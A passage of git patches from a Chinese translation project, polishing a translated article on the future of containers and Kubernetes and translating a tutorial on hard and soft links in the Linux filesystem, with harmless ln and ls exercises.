Sanchez 表示:_** ”在不久的将来我们就能看到不依赖于 Docker 而使用其他运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [小编提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” -**_来自小强实验室(Cockroach Labs)的 Alex Robinson 表示:_** “k8s 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 k8s 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 k8s 平台内部以及在外部服务商一端做出的一些改进。” +**_来自小强实验室(Cockroach Labs)的 Alex Robinson 表示:_“**k8s 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 k8s 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 k8s 平台内部以及在外部服务商一端做出的一些改进。” ------------------------------------------------------------------------------- via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next From 4cec0af25f1a388903a7245c40a4b9acdf8511a3 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Sat, 2 Dec 2017 23:46:55 +0800 Subject: [PATCH 0132/1627] modified v2 --- .../tech/20171120 Containers and Kubernetes Whats next.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md index 62a81dc9fa..aab7d76564 100644 --- a/translated/tech/20171120 Containers and Kubernetes Whats next.md +++ b/translated/tech/20171120 Containers and Kubernetes Whats next.md @@ -8,7 +8,7 @@ 来自 [_The new stack_][5] 的调研数据表明,容器的推广使用是编排管理被推广的主要的催化剂。根据调研参与者的反馈数据,在已经将容器技术使用到生产环境中的使用者里,有六成正在将 kubernetes(k8s)编排管理广泛的应用在生产环境中,另外百分之十九的人员则表示他们已经处于部署 k8s 的初级阶段。在容器部署初期的使用者当中,虽然只有百分之五的人员表示已经在使用 K8s ,但是百分之五十八的人员表示他们正在计划和准备使用 K8s。总而言之,容器和 Kuebernetes 的关系就好比是鸡和蛋一样,相辅相成紧密关联。众多专家一致认为编排管理工具对容器的[长周期管理][6] 以及其在市场中的发展有至关重要的作用。正如 [Cockroach 实验室][7] 的 Alex Robinson 所说,容器编排管理被更广泛的拓展和应用是一个总体的大趋势。毫无疑问,这是一个正在快速演变的领域,且未来潜力无穷。鉴于此,我们对罗宾逊和其他的一些容器的实际使用和推介者做了采访,来从他们作为容器技术的践行者的视角上展望一下容器编排以及 k8s 的下一步发展。 -### **容器编排将被主流接受*** +### **容器编排将被主流接受** 像任何重要技术的转型一样,我们就像是处在一个高崖之上一般,在经过了初期步履蹒跚的跋涉之后将要来到一望无际的广袤平原。广大的新天地和平实真切的应用需求将会让这种新技术在主流应用中被迅速推广,尤其是在大企业环境中。正如 Alex Robinson 说的那样,容器技术的淘金阶段已经过去,早期的技术革新创新正在减速,随之而来的则是市场对容器技术的稳定性和可用性的强烈需求。这意味着未来我们将不会再见到大量的新的编排管理系统的涌现,而是会看到容器技术方面更多的安全解决方案,更丰富的管理工具,以及基于目前主流容器编排系统的更多的新特性。 @@ -16,7 +16,7 @@ 人们将在简化容器的部署方面下大功夫,因为容器部署的初期工作对很多公司和组织来说还是比较复杂的,尤其是容器的[长期管理维护][8]更是需要投入大量的精力。正如 [Codemill AB][9] 公司的 My Karlsson 所说,容器编排技术还是太复杂了,这导致很多使用者难以娴熟驾驭和充分利用容器编排的功能。很多容器技术的新用户都需要花费很多精力,走很多弯路,才能搭建小规模的,单个的,被隔离的容器系统。这种现象在那些没有针对容器技术设计和优化的应用中更为明显。在简化容器编排管理方面有很多优化可以做,这些优化和改造将会使容器技术更加具有可用性。 -### **在 hybrid cloud 以及 multi-cloud 技术方面会有更多侧重*** +### **在 hybrid cloud 以及 multi-cloud 技术方面会有更多侧重** 随着容器和容器编排技术被越来越多的使用,更多的组织机构会选择扩展他们现有的容器技术的部署,从之前的把非重要系统部署在单一环境的使用情景逐渐过渡到更加[复杂的使用情景][10]。对很多公司来说,这意味着他们必须开始学会在 [hybrid cloud][11] 和 [muilti-cloud][12] 的环境下,全局化的去管理那些容器化的应用和微服务。正如红帽 [Openshift 部门产品战略总监][14] [Brian Gracely][13] 所说,容器和 k8s 技术的使用使得我们成功的实现了混合云以及应用的可移植性。结合 Open Service Broker API 的使用,越来越多的结合私有云和公有云资源的新应用将会涌现出来。 据 [CloudBees][15] 公司的高级工程师 Carlos Sanchez 分析,联合服务(Federation)将会得到极大推动,使一些诸如多地区部署和多云部署等的备受期待的新特性成为可能。 @@ -38,9 +38,9 @@ **_来自 Sumo Logic 的 Ben Newton 表示:_** “随着 k8s 成为一个具有统治地位的平台,我预计更多的操作机制将会被统一化,尤其是 k8s 将和第三方管理和监控平台融合起来。” -**_来自 CloudBees 的 Carlos Sanchez 表示:_** ”在不久的将来我们就能看到不依赖于 Docker 而使用其他运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [小编提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” +**_来自 CloudBees 的 Carlos Sanchez 表示:_** “在不久的将来我们就能看到不依赖于 Docker 而使用其他运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [小编提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” -**_来自小强实验室(Cockroach Labs)的 Alex Robinson 表示:_“**k8s 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 k8s 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 k8s 平台内部以及在外部服务商一端做出的一些改进。” +**_来自 Cockroach Labs 的 Alex Robinson 表示:_** “ k8s 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 k8s 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 k8s 平台内部以及在外部服务商一端做出的一些改进。” ------------------------------------------------------------------------------- via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next From a9ff43c82f80c4bf29a282d8cdf6ea5aaec034da Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Sat, 2 Dec 2017 23:50:05 +0800 Subject: [PATCH 0133/1627] modified v3 --- .../tech/20171120 Containers and Kubernetes Whats next.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md index aab7d76564..7d96d3350c 100644 --- a/translated/tech/20171120 Containers and Kubernetes Whats next.md +++ b/translated/tech/20171120 Containers and Kubernetes Whats next.md @@ -27,7 +27,7 @@ 对任何一种科技来说,持续的整合和加强从来都是大势所趋; 容器编排管理技术在这方面也不例外。来自 [Sumo Logic][17] 的首席分析师 Ben Newton 表示,随着容器化渐成主流,软件工程师们正在很少数的一些技术上做持续整合加固的工作,来满足他们的一些微应用的需求。容器和 K8s 将会毫无疑问的成为容器编排管理方面的主流平台,并轻松碾压其他的一些小众平台方案。因为 K8s 提供了一个相当清晰的可以摆脱各种特有云生态的途径,K8s 将被大量公司使用,逐渐形成一个不依赖于某个特定云服务的“中立云”(cloud-neutral)。 -### ** K8s 的下一站** +### **K8s 的下一站** 来自 [Alcide][18] 的 CTO 和联合创始人 Gadi Naor 表示,k8s 将会是一个有长期和远景发展的技术,虽然我们的社区正在大力推广和发展 k8s,k8s 仍有很长的路要走。 专家们对[日益流行的 k8s 平台][19]也作出了以下一些预测: From dbb695755875154173f3f59b9ac51d22d077785e Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Sat, 2 Dec 2017 23:51:49 +0800 Subject: [PATCH 0134/1627] modified yunfengHe final --- translated/tech/20171120 Containers and Kubernetes Whats next.md | 1 + 1 file changed, 1 insertion(+) diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md index 7d96d3350c..5ed099c170 100644 --- a/translated/tech/20171120 Containers and Kubernetes Whats next.md +++ b/translated/tech/20171120 Containers and Kubernetes Whats next.md @@ -41,6 +41,7 @@ **_来自 CloudBees 的 Carlos Sanchez 表示:_** “在不久的将来我们就能看到不依赖于 Docker 而使用其他运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [小编提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” **_来自 Cockroach Labs 的 Alex Robinson 表示:_** “ k8s 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 k8s 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 k8s 平台内部以及在外部服务商一端做出的一些改进。” + ------------------------------------------------------------------------------- via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next From 5774a55c1fd83652a93db920b4bf3e688eaa2506 Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Sat, 2 Dec 2017 23:58:22 +0800 Subject: [PATCH 0135/1627] translated yunfengHe --- ...20 Containers and Kubernetes Whats next.md | 98 ------------------- 1 file changed, 98 deletions(-) delete mode 100644 sources/tech/20171120 Containers and Kubernetes Whats next.md diff --git a/sources/tech/20171120 Containers and Kubernetes Whats next.md b/sources/tech/20171120 Containers and Kubernetes Whats next.md deleted file mode 100644 index 1a8400d7cd..0000000000 --- a/sources/tech/20171120 Containers and Kubernetes Whats next.md +++ /dev/null @@ -1,98 +0,0 @@ -YunfengHe Translating -Containers and Kubernetes: What's next? -============================================================ - -### What's ahead for container orchestration and Kubernetes? Here's an expert peek - -![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") - -If you want a basic idea of where containers are headed in the near future, follow the money. There’s a lot of it: 451 Research projects that the overall market for containers will hit roughly [$2.7 billion in 2020][4], a 3.5-fold increase from the $762 million spent on container-related technology in 2016. - -There’s an obvious fundamental factor behind such big numbers: Rapidly increasing containerization. The parallel trend: As container adoption grows, so will container _orchestration_ adoption. - -As recent survey data from [_The New Stack_][5] indicates, container adoption is the most significant catalyst of orchestration adoption: 60 percent of respondents who’ve deployed containers broadly in production report they’re also using Kubernetes widely in production. Another 19 percent of respondents with broad container deployments in production were in the initial stages of broad Kubernetes adoption. Meanwhile, just 5 percent of those in the initial phases of deploying containers in production environments were using Kubernetes broadly – but 58 percent said they were preparing to do so. It’s a chicken-and-egg relationship. - - -Most experts agree that an orchestration tool is essential to the scalable [long-term management of containers][6] – and corresponding developments in the marketplace. “The next trends in container orchestration are all focused on broadening adoption,” says Alex Robinson, software engineer at [Cockroach Labs][7]. - -This is a quickly shifting landscape, one that is just starting to realize its future potential. So we checked in with Robinson and other practitioners to get their boots-on-the-ground perspective on what’s next in container orchestration – and for Kubernetes itself. - -### **Container orchestration shifts to mainstream** - -We’re at the precipice common to most major technology shifts, where we transition from the careful steps of early adoption to cliff-diving into commonplace use. That will create new demand for the plain-vanilla requirements that make mainstream adoption easier, especially in large enterprises. - -“The gold rush phase of early innovation has slowed down and given way to a much stronger focus on stability and usability,” Robinson says. “This means we'll see fewer major announcements of new orchestration systems, and more security options, management tools, and features that make it easier to take advantage of the flexibility already inherent in the major orchestration systems.” - -### **Reduced complexity** - -On a related front, expect an intensifying effort to cut back on the complexity that some organizations face when taking their first plunge into container orchestration. As we’ve covered before, deploying a container might be “easy,” but [managing containers long-term ][8]requires more care. - -“Today, container orchestration is too complex for many users to take full advantage,” says My Karlsson, developer at [Codemill AB][9]. “New users are often struggling just to get single or small-size container configurations running in isolation, especially when applications are not originally designed for it. There are plenty of opportunities to simplify the orchestration of non-trivial applications and make the technology more accessible.” - -### **Increasing focus on hybrid cloud and multi-cloud** - -As adoption of containers and container orchestration grows, more organizations will scale from a starting point of, say, running non-critical workloads in a single environment to more [complex use cases][10] across multiple environments. For many companies, that will mean managing containerized applications (and particularly containerized microservices) across [hybrid cloud][11] and [multi-cloud][12] environments, often globally. - -"Containers and Kubernetes have made hybrid cloud and application portability a reality,” says [Brian Gracely][13], director of [Red Hat][14] OpenShift product strategy. “Combined with the Open Service Broker, we expect to see an explosion of new applications that combine private and public cloud resources." - -“I believe that federation will get a push, enabling much-wanted features such as seamless multi-region and multi-cloud deployments,” says Carlos Sanchez, senior software engineer at [CloudBees][15]. - -**[ Want CIO wisdom on hybrid cloud and multi-cloud strategy? See our related resource, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** - -### **Continued consolidation of platforms and tools** - -Technology consolidation is common trend; container orchestration is no exception. - -“As containerization goes mainstream, engineers are consolidating on a very small number of technologies to run their [microservices and] containers and Kubernetes will become the dominant container orchestration platform, far outstripping other platforms,” says Ben Newton, analytics lead at [Sumo Logic][17]. “Companies will adopt Kubernetes to drive a cloud-neutral approach as Kubernetes provides a reasonably clear path to reduce dependence on [specific] cloud ecosystems.**”** - -### **Speaking of Kubernetes, what’s next?** - -"Kubernetes is here for the long haul, and the community driving it is doing great job – but there's lots ahead,” says Gadi Naor, CTO and co-founder of [Alcide][18]. Our experts shared several predictions specific to [the increasingly popular Kubernetes platform][19]: - - **_Gadi Naor at Alcide:_** “Operators will continue to evolve and mature, to a point where applications running on Kubernetes will become fully self-managed. Deploying and monitoring microservices on top of Kubernetes with [OpenTracing][20] and service mesh frameworks such as [istio][21] will help shape new possibilities.” - - **_Brian Gracely at Red Hat:_** “Kubernetes continues to expand in terms of the types of applications it can support. When you can run traditional applications, cloud-native applications, big data applications, and HPC or GPU-centric applications on the same platform, it unlocks a ton of architectural flexibility.” - - **_Ben Newton at Sumo Logic: _ “**As Kubernetes becomes more dominant, I would expect to see more normalization of the operational mechanisms – particularly integrations into third-party management and monitoring platforms.” - - **_Carlos Sanchez at CloudBees: _** “In the immediate future there is the ability to run without Docker, using other runtimes...to remove any lock-in. [Editor’s note: [CRI-O][22], for example, offers this ability.] “Also, [look for] storage improvements to support enterprise features like data snapshotting and online volume resizing.” - - - **_Alex Robinson at Cockroach Labs: _ “**One of the bigger developments happening in the Kubernetes community right now is the increased focus on managing [stateful applications][23]. Managing state in Kubernetes right now is very difficult if you aren't running in a cloud that offers remote persistent disks, but there's work being done on multiple fronts [both inside Kubernetes and by external vendors] to improve this.” - --------------------------------------------------------------------------------- - -via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next - -作者:[Kevin Casey ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://enterprisersproject.com/user/kevin-casey -[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats -[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity -[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ -[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf -[5]:https://thenewstack.io/ -[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[7]:https://www.cockroachlabs.com/ -[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[9]:https://codemill.se/ -[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA -[11]:https://enterprisersproject.com/hybrid-cloud -[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference -[13]:https://enterprisersproject.com/user/brian-gracely -[14]:https://www.redhat.com/en -[15]:https://www.cloudbees.com/ -[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ -[17]:https://www.sumologic.com/ -[18]:http://alcide.io/ -[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english -[20]:http://opentracing.io/ -[21]:https://istio.io/ -[22]:http://cri-o.io/ -[23]:https://opensource.com/article/17/2/stateful-applications -[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 -[25]:https://enterprisersproject.com/user/kevin-casey \ No newline at end of file From 52bd942e462c6b66a0a7cc64d26f8bf2eadda88c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Sun, 3 Dec 2017 00:19:34 +0800 Subject: [PATCH 0136/1627] Update 20170622 A users guide to links in the Linux filesystem.md --- ... guide to links in the Linux filesystem.md | 71 +++++++++---------- 1 file changed, 35 insertions(+), 36 deletions(-) diff --git a/sources/tech/20170622 A users guide to links in the Linux filesystem.md b/sources/tech/20170622 A users guide to links in the Linux filesystem.md index 5dc6f72e35..5ee614a216 100644 --- a/sources/tech/20170622 A users guide to links in the Linux filesystem.md +++ b/sources/tech/20170622 A users guide to links in the Linux filesystem.md @@ -23,11 +23,11 @@ linux 文件系统中有两种链接:硬链接和软链接。虽然二者差 *   [linux 高级命令速查表][4] -* [Our latest Linux articles][5] +*   [我们最新的 linux 文章][5] -I have found, for instance, that some programs required a particular version of a library. When a library upgrade replaced the old version, the program would crash with an error specifying the name of the old, now-missing library. Usually, the only change in the library name was the version number. Acting on a hunch, I simply added a link to the new library but named the link after the old library name. I tried the program again and it worked perfectly. And, okay, the program was a game, and everyone knows the lengths that gamers will go to in order to keep their games running. +举个例子,我曾发现一些程序要求特定的版本库方可运行。 当用升级后的库替代旧库后,程序会崩溃,提示就版本库缺失。 同城库中唯一变化是版本号。出于该直觉,我仅仅给程序添加了一个新的库链接,并以旧库名称命名。我试着再次启动程序,运行良好。 程序就是一个游戏,人人都明白,每个玩家都会尽力使游戏进行下去。 -In fact, almost all applications are linked to libraries using a generic name with only a major version number in the link name, while the link points to the actual library file that also has a minor version number. In other instances, required files have been moved from one directory to another to comply with the Linux file specification, and there are links in the old directories for backwards compatibility with those programs that have not yet caught up with the new locations. If you do a long listing of the **/lib64** directory, you can find many examples of both. +事实上,几乎所有的应用程序链接库都使用通用的命名规则,链接名称中包含了住版本号,链接所指文件的文件名中同样包含了最小版本号。再比如,程序的一些必需文件为了迎合 linux 文件系统的规范从一个目录移动到另一个目录中,系统为了向后兼容那些不能获取这些文件新位置的程序在旧的目录中存放了这些文件的链接。如果你对 /lib64 目录做一个长清单列表,你会发现很多这样的例子。 ``` lrwxrwxrwx. 1 root root 36 Dec 8 2016 cracklib_dict.hwm -> ../../usr/share/cracklib/pw_dict.hwm @@ -45,56 +45,56 @@ lrwxrwxrwx. 1 root root 30 Jan 16 16:39 libakonadi-calendar.so.4 -> libak lrwxrwxrwx. 1 root root 29 Jan 16 16:39 libakonadi-contact.so.4 -> libakonadi-contact.so.4.14.26 ``` -A few of the links in the **/lib64** directory +**/lib64** 目录下的一些链接 -The long listing of the **/lib64** directory above shows that the first character in the filemode is the letter "l," which means that each is a soft or symbolic link. +T在上面展示的 **/lib64** 目录清单列表中,文件模式第一个字母 I 表示这是一个符号链接或软链接。 -### Hard links +### 硬链接 -In [An introduction to Linux's EXT4 filesystem][15], I discussed the fact that each file has one inode that contains information about that file, including the location of the data belonging to that file. [Figure 2][16] in that article shows a single directory entry that points to the inode. Every file must have at least one directory entry that points to the inode that describes the file. The directory entry is a hard link, thus every file has at least one hard link. +在 [An introduction to Linux's EXT4 filesystem][15]一文中,我曾探讨过这样一个事实,每个文件都有一个包含该文件信息的节点,包含了该文件的位置信息。上述文章中的[图2][16]展示了一个指向文件节点的单一目录项。每个文件都至少有一个目录项指向描述该文件信息的文件节点,目录项是一个硬链接,因此每个文件至少都有一个硬链接。 -In Figure 1 below, multiple directory entries point to a single inode. These are all hard links. I have abbreviated the locations of three of the directory entries using the tilde (**~**) convention for the home directory, so that **~** is equivalent to **/home/user** in this example. Note that the fourth directory entry is in a completely different directory, **/home/shared**, which might be a location for sharing files between users of the computer. +如下图1所示,多个目录项指向了同一文件节点。这些目录项都是硬链接。我曾使用波浪线 (**~**) 表示三级目录项的缩写,这是用户目录的惯例表示,因此在该例中波浪线等同于 **/home/user** 。值得注意的是,四级目录项是一个完全不同的目录,**/home/shared** 可能是该计算机上用户的共享文件目录。 ![fig1directory_entries.png](https://opensource.com/sites/default/files/images/life/fig1directory_entries.png) Figure 1 -Hard links are limited to files contained within a single filesystem. "Filesystem" is used here in the sense of a partition or logical volume (LV) that is mounted on a specified mount point, in this case **/home**. This is because inode numbers are unique only within each filesystem, and a different filesystem, for example, **/var**or **/opt**, will have inodes with the same number as the inode for our file. +单一文件系统中的文件硬链接数是有限制的。”文件系统“ 是就挂载在特定挂载点上的分区或逻辑卷而言的,此例中是 /home。这是因为文件系统中的节点号都是唯一的。在不同的文件系统中,如 **/var** 或 **/opt**,会有和 **/home** 中相同的节点号。 -Because all the hard links point to the single inode that contains the metadata about the file, all of these attributes are part of the file, such as ownerships, permissions, and the total number of hard links to the inode, and cannot be different for each hard link. It is one file with one set of attributes. The only attribute that can be different is the file name, which is not contained in the inode. Hard links to a single **file/inode** located in the same directory must have different names, due to the fact that there can be no duplicate file names within a single directory. +因为所有的硬链接都指向了包含文件元信息的节点,这些特性都是文件的一部分,像所属关系,权限,节点硬链接数目,这些特性不能区分不同的硬链接。这是一个文件所具有的一组属性。唯一能区分这些文件的是包含在节点信息中的文件名。对单靠 **file/inode** 来定位文件的同一目录中的硬链接必须拥有不同的文件名,基于上述事实,同一目录下不能存在重复的文件名。 -The number of hard links for a file is displayed with the **ls -l** command. If you want to display the actual inode numbers, the command **ls -li** does that. +文件的硬链接数目可通过 **ls -l** 来查看,如果你想查看实际节点号,可使用 **ls -li** 命令。 -### Symbolic (soft) links +### 符号(软)链接 -The difference between a hard link and a soft link, also known as a symbolic link (or symlink), is that, while hard links point directly to the inode belonging to the file, soft links point to a directory entry, i.e., one of the hard links. Because soft links point to a hard link for the file and not the inode, they are not dependent upon the inode number and can work across filesystems, spanning partitions and LVs. +软链接(符号链接)和硬链接的区别在于,硬链接直接指向文件中的节点而软链接直接指向一个目录项,即一个硬链接。因为软链接指向一个文件的硬链接而非该文件的节点信息,所以它们并不依赖于文件节点,这使得它们能在不同的文件系统中起作用,跨越不同的分区和逻辑卷。 -The downside to this is: If the hard link to which the symlink points is deleted or renamed, the symlink is broken. The symlink is still there, but it points to a hard link that no longer exists. Fortunately, the **ls** command highlights broken links with flashing white text on a red background in a long listing. +软链接的缺点是,一旦它所指向的硬链接被删除或重命名后,该软链接就失效了。软链接虽然还在,但所指向的硬链接已不存在。所幸的是,**ls** 命令能以红底白字的方式在其列表中高亮显示失效的软链接。 -### Lab project: experimenting with links +### 实验项目: 链接实验 -I think the easiest way to understand the use of and differences between hard and soft links is with a lab project that you can do. This project should be done in an empty directory as a  _non-root user_ . I created the **~/temp** directory for this project, and you should, too. It creates a safe place to do the project and provides a new, empty directory to work in so that only files associated with this project will be located there. +我认为最容易理解链接用法及其差异的方法即使动手搭建一个项目。这个项目应以非超级用户的身份在一个空目录下进行。我创建了 **~/tmp** 目录做这个实验,你也可以这么做。这么做可为项目创建一个安全的环境且提供一个新的空目录让程序运作,如此以来这儿仅存放和程序有关的文件。 -### **Initial setup** +### **初始工作** -First, create the temporary directory in which you will perform the tasks needed for this project. Ensure that the present working directory (PWD) is your home directory, then enter the following command. +首先,在你要进行实验的目录下为该项目中的任务创建一个临时目录,确保当前工作目录(PWD)是你的主目录,然后键入下列命令。 ``` mkdir temp ``` -Change into **~/temp** to make it the PWD with this command. +使用这个命名将当前工作目录切换到 *~/temp**  ``` cd temp ``` -To get started, we need to create a file we can link to. The following command does that and provides some content as well. +实验开始,我们创建一个能够链接的文件,下列命令可完成该工作并向其填充内容。 ``` du -h > main.file.txt ``` -Use the **ls -l** long list to verify that the file was created correctly. It should look similar to my results. Note that the file size is only 7 bytes, but yours may vary by a byte or two. +使用 *ls -l** 长列表命名确认文件被正确地创建。运行结果应类似于我的。注意文件大小只有 7 字节,但你的可能会有 1~2 字节的变动。 ``` [dboth@david temp]$ ls -l @@ -102,11 +102,11 @@ total 4 -rw-rw-r-- 1 dboth dboth 7 Jun 13 07:34 main.file.txt ``` -Notice the number "1" following the file mode in the listing. That number represents the number of hard links that exist for the file. For now, it should be 1 because we have not created any additional links to our test file. +在列表中,文件模式串后的数字 1 代表存在于该文件上的硬链接数。现在应该是 1 ,因为我们还没有为这个测试文件建立任何硬链接。 -### **Experimenting with hard links** +### **对硬链接进行实验** -Hard links create a new directory entry pointing to the same inode, so when hard links are added to a file, you will see the number of links increase. Ensure that the PWD is still **~/temp**. Create a hard link to the file **main.file.txt**, then do another long list of the directory. +硬链接创建一个指向同一文件节点的目录项,当为文件添加一个硬链接时,你会看到链接数目的增加。确保当前工作目录仍为 **~/temp**。创建一个指向 **main.file.txt** 的硬链接,然后查看该目录下文件列表。 ``` [dboth@david temp]$ ln main.file.txt link1.file.txt @@ -116,7 +116,7 @@ total 8 -rw-rw-r-- 2 dboth dboth 7 Jun 13 07:34 main.file.txt ``` -Notice that both files have two links and are exactly the same size. The date stamp is also the same. This is really one file with one inode and two links, i.e., directory entries to it. Create a second hard link to this file and list the directory contents. You can create the link to either of the existing ones: **link1.file.txt** or **main.file.txt**. +目录中两个文件都有两个链接且大小相同,时间戳也一样。这是同一文件节点的两个不同的硬链接,即该文件的目录项。再建立一个该文件的硬链接,并列出目录清单内容,你可以建立 **link1.file.txt** 或 **main.file.txt** 的硬链接。 ``` [dboth@david temp]$ ln link1.file.txt link2.file.txt ; ls -l @@ -126,22 +126,21 @@ total 16 -rw-rw-r-- 3 dboth dboth 7 Jun 13 07:34 main.file.txt ``` -Notice that each new hard link in this directory must have a different name because two files—really directory entries—cannot have the same name within the same directory. Try to create another link with a target name the same as one of the existing ones. +注意,该目录下的每个硬链接必须使用不同的名称,因为同一目录下的两个文件不能拥有相同的文件名。试着创建一个和现存链接名称相同的硬链接。 ``` [dboth@david temp]$ ln main.file.txt link2.file.txt ln: failed to create hard link 'link2.file.txt': File exists ``` -Clearly that does not work, because **link2.file.txt** already exists. So far, we have created only hard links in the same directory. So, create a link in your home directory, the parent of the temp directory in which we have been working so far. +显然不行,因为 **link2.file.txt** 已经存在。目前为止我们只在同一目录下创建硬链接,接着在临时目录的父目录,你的主目录中创建一个链接。 ``` [dboth@david temp]$ ln main.file.txt ../main.file.txt ; ls -l ../main* -rw-rw-r-- 4 dboth dboth 7 Jun 13 07:34 main.file.txt ``` -The **ls** command in the above listing shows that the **main.file.txt** file does exist in the home directory with the same name as the file in the temp directory. Of course, these are not different files; they are the same file with multiple links—directory entries—to the same inode. To help illustrate the next point, add a file that is not a link. - + 上面的 **ls** 命令显示 **main.file.txt** 文件确实存在于主目录中,且与该文件在 temp 目录中的名称一致。当然它们是没有区别的两个文件,它们是同一文件的两个链接,指向了同一文件的目录项。为了帮助说明下一点,在 temp 目录中添加一个非链接文件。 ``` [dboth@david temp]$ touch unlinked.file ; ls -l total 12 @@ -151,7 +150,7 @@ total 12 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -Look at the inode number of the hard links and that of the new file using the **-i**option to the **ls** command. +使用 **ls** 命令的 **i** 选项查看文件节点的硬链接号和新创建文件的硬链接号。 ``` [dboth@david temp]$ ls -li @@ -162,9 +161,9 @@ total 12 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -Notice the number **657024** to the left of the file mode in the example above. That is the inode number, and all three file links point to the same inode. You can use the **-i** option to view the inode number for the link we created in the home directory as well, and that will also show the same value. The inode number of the file that has only one link is different from the others. Note that the inode numbers will be different on your system. +注意上面文件模式左边的数字 **657024** ,这是三个硬链接文件所指的同一文件的节点号,你也可以使用 **i** 选项查看主目录中所创建的链接节点号,和该值相同。只有一个链接的文件节点号和其他的不同,在你的系统上看到的不同于本文中的。 -Let's change the size of one of the hard-linked files. +接着改变其中一个硬链接文件的大小。 ``` [dboth@david temp]$ df -h > link2.file.txt ; ls -li @@ -175,11 +174,11 @@ total 12 657863 -rw-rw-r-- 1 dboth dboth 0 Jun 14 08:18 unlinked.file ``` -The file size of all the hard-linked files is now larger than before. That is because there is really only one file that is linked to by multiple directory entries. +现在的硬链接文件大小比原来大,因为多个目录项链接着同一文件。 -I know this next experiment will work on my computer because my **/tmp**directory is on a separate LV. If you have a separate LV or a filesystem on a different partition (if you're not using LVs), determine whether or not you have access to that LV or partition. If you don't, you can try to insert a USB memory stick and mount it. If one of those options works for you, you can do this experiment. +我知道下个实验在我的电脑上会成功,因为我的 **/tmp** 目录是一个独立的逻辑卷,如果你有单独的逻辑卷或文件系统在不同的分区上(如果未使用逻辑卷),确定你是否能访问那个分区或逻辑卷,如果不能,你可以在电脑上挂载一个 U盘,如果上述选项适合你,你可以进行这个实验。 -Try to create a link to one of the files in your **~/temp** directory in **/tmp** (or wherever your different filesystem directory is located). +试着在 **/tmp** 目录中建立一个 **~/temp** 目录下文件的链接(或你的文件系统所在的位置) ``` [dboth@david temp]$ ln link2.file.txt /tmp/link3.file.txt @@ -187,7 +186,7 @@ ln: failed to create hard link '/tmp/link3.file.txt' => 